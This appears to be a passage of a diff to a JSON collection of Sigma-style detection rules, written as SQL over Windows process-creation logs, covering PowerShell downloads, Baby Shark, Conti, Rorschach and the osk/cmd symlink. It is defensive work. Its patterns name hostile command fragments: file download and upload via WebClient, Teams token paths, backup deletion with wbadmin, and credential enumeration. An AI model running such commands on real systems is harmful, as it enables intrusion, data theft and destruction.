"experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1614.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel 
= 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Microsoft SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", - "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND 
(CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Utilization of this tool should not be seen in enterprise environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE 
'\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE 
'%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR 
CommandLine LIKE '%#46%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + }, + { + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' 
ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' 
OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ - "Very unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "description": "Detects a command used by conti to find volume shadow backups", + "author": 
"Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. 
A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", + "status": "experimental", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "status": "experimental", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine 
Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE 
